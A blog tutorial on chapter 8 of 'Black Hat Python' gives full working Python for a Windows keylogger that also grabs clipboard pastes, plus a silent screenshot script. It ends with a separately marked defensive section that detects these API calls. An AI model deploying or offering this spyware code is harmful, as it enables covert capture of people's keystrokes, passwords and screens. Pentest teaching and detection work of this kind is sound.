Black Hat Python: Python Programming for Hackers and Pentesters (10), Chapter 8

  Network Penetration Testing     |      2023-03-26 02:01

This tutorial covers Black Hat Python: Python Programming for Hackers and Pentesters (10), Chapter 8: Common Trojan Functions on Windows.

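Fun with Keylogging

First install two packages, pythoncom and pyHook.

When installing these two packages, pay close attention to version compatibility!!! It took me a long time to get this working.
For 32-bit Python 2.7, this tutorial works:
https://blog.csdn.net/xiaoliu5396/article/details/46457585
When I installed it, I hit the following error: Python version 2.7 required, which was not found in the registry.
Fix:
https://blog.csdn.net/zklth/article/details/8117207

For 64-bit Python 2.7, I followed this tutorial:
https://www.cnblogs.com/helloworldcc/p/9427452.html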

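What I did:
1) Update pip to the latest version
python -m pip install --upgrade pip (this step can probably be skipped)

2) Download the 64-bit pywin32: https://pypi.org/project/pywin32/#files

Put it in the Scripts folder under the Python installation path.

3) Download the 64-bit pyHook: https://www.lfd.uci.edu/~gohlke/pythonlibs/#pyhook

It is best to search the page with win+f, otherwise it is hard to find...
Put it in the Scripts folder under the Python installation path.

4) Install pywin32 and pyHook
From the Scripts folder of the Python installation, run: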
pip.exe install pywin32-224-cp27-cp27m-win_amd64.whl
pip.exe install pyHook-1.5.1-cp27-cp27m-win_amd64.whl

The prerequisites are now in place.

———————————————————————————————————————

Code:

```python
from ctypes import *
import pythoncom
import pyHook
import win32clipboard

user32 = windll.user32
kernel32 = windll.kernel32
psapi = windll.psapi
current_window = None

def get_current_process():

    # get a handle to the foreground window
    hwnd = user32.GetForegroundWindow()

    # find the process ID
    pid = c_ulong(0)
    user32.GetWindowThreadProcessId(hwnd, byref(pid))

    # store the current process ID
    process_id = "%d" % pid.value

    # grab the executable
    executable = create_string_buffer("\x00" * 512)
    h_process = kernel32.OpenProcess(0x400 | 0x10, False, pid)

    psapi.GetModuleBaseNameA(h_process,None,byref(executable),512)

    # now read it's title
    window_title = create_string_buffer("\x00" * 512)
    length = user32.GetWindowTextA(hwnd, byref(window_title),512)

    # print out the header if we're in the right process
    print
    print "[ PID: %s - %s - %s ]" % (process_id, executable.value, window_title.value)
    print

    # close handles
    kernel32.CloseHandle(hwnd)
    kernel32.CloseHandle(h_process)

def KeyStroke(event):

    global current_window

    # check to see if target changed windows
    if event.WindowName != current_window:
        current_window = event.WindowName
        get_current_process()

    # if they pressed a standard key
    if event.Ascii > 32 and event.Ascii < 127:
        print chr(event.Ascii),
    else:
        # if [Ctrl-V], get the value on the clipboard
        # added by Dan Frisch 2014
        if event.Key == "V":
            win32clipboard.OpenClipboard()
            pasted_value = win32clipboard.GetClipboardData()
            win32clipboard.CloseClipboard()
            print "[PASTE] - %s" % (pasted_value),
        else:
            print "[%s]" % event.Key,

    # pass execution to next hook registered
    return True

# create and register a hook manager
kl = pyHook.HookManager()
kl.KeyDown = KeyStroke

# register the hook and execute forever
kl.HookKeyboard()
pythoncom.PumpMessages()
```

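Test:
After running the code, open another cmd window and type test; the characters you type will appear in the first window.

Try browsing a website:

Taking Screenshots

Code: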

```python
import win32gui
import win32ui
import win32con
import win32api

# grab a handle to the main desktop window
hdesktop = win32gui.GetDesktopWindow()

# determine the size of all monitors in pixels
width = win32api.GetSystemMetrics(win32con.SM_CXVIRTUALSCREEN)
height = win32api.GetSystemMetrics(win32con.SM_CYVIRTUALSCREEN)
left = win32api.GetSystemMetrics(win32con.SM_XVIRTUALSCREEN)
top = win32api.GetSystemMetrics(win32con.SM_YVIRTUALSCREEN)

# create a device context
desktop_dc = win32gui.GetWindowDC(hdesktop)
img_dc = win32ui.CreateDCFromHandle(desktop_dc)

# create a memory based device context
mem_dc = img_dc.CreateCompatibleDC()

# create a bitmap object
screenshot = win32ui.CreateBitmap()
screenshot.CreateCompatibleBitmap(img_dc, width, height)
mem_dc.SelectObject(screenshot)

# copy the screen into our memory device context
mem_dc.BitBlt((0, 0), (width, height), img_dc, (left, top), win32con.SRCCOPY)

# save the bitmap to a file
screenshot.SaveBitmapFile(mem_dc, 'c:\\WINDOWS\\Temp\\screenshot.bmp')

# free our objects
mem_dc.DeleteDC()
win32gui.DeleteObject(screenshot.GetHandle())
```

Result:
The captured screenshot:
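From the defender's side, the pyHook and Win32 calls that the two scripts above depend on are the same names a static triage pass over a suspicious Python sample looks for. The following is an added example, not code from the original post or the book; the rule names, verdict labels and sample strings are assumptions constructed for illustration.

```python
import re

# Call names taken from the two scripts on this page, grouped by the
# capability they implement. A rule fires only if every name is called.
RULES = {
    "keyboard_hook": {"HookManager", "HookKeyboard", "PumpMessages"},
    "window_tracking": {"GetForegroundWindow", "GetWindowThreadProcessId"},
    "clipboard_read": {"OpenClipboard", "GetClipboardData"},
    "screen_capture": {"GetDesktopWindow", "BitBlt", "SaveBitmapFile"},
}
CALL = re.compile(r"\b([A-Za-z_]\w*)\s*\(")

def called_names(source):
    """Names used in call position, ignoring '#' comments.
    Regex based so Python 2 samples (print statements) can be scanned from
    Python 3; a '#' inside a string literal truncates that line (accepted)."""
    code = "\n".join(line.split("#", 1)[0] for line in source.splitlines())
    return set(CALL.findall(code))

def triage(source):
    """Return (sorted capability list, verdict) for one script's text."""
    names = called_names(source)
    caps = sorted(c for c, needed in RULES.items() if needed <= names)
    if "keyboard_hook" in caps and {"window_tracking", "clipboard_read"} & set(caps):
        verdict = "keystroke-capture"   # hook plus context or clipboard collection
    elif "screen_capture" in caps:
        verdict = "screen-capture"
    elif caps:
        verdict = "review"              # a single capability, often benign
    else:
        verdict = "no-match"
    return caps, verdict

# Constructed samples (labelled as such): call lines only, no working logic.
SAMPLE_HOOK = """
hwnd = user32.GetForegroundWindow()
user32.GetWindowThreadProcessId(hwnd, byref(pid))
kl = pyHook.HookManager()
kl.HookKeyboard()
pythoncom.PumpMessages()
"""
SAMPLE_DOC = """
# a hook would call HookManager(), HookKeyboard(), PumpMessages()
win32clipboard.OpenClipboard()
text = win32clipboard.GetClipboardData()
"""

if __name__ == "__main__":
    for label, src in (("hook", SAMPLE_HOOK), ("doc", SAMPLE_DOC)):
        print(label, triage(src))
```

Name matching of this kind is defeated by renaming or dynamic lookup, so treat a hit as a reason to inspect the sample rather than as proof.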
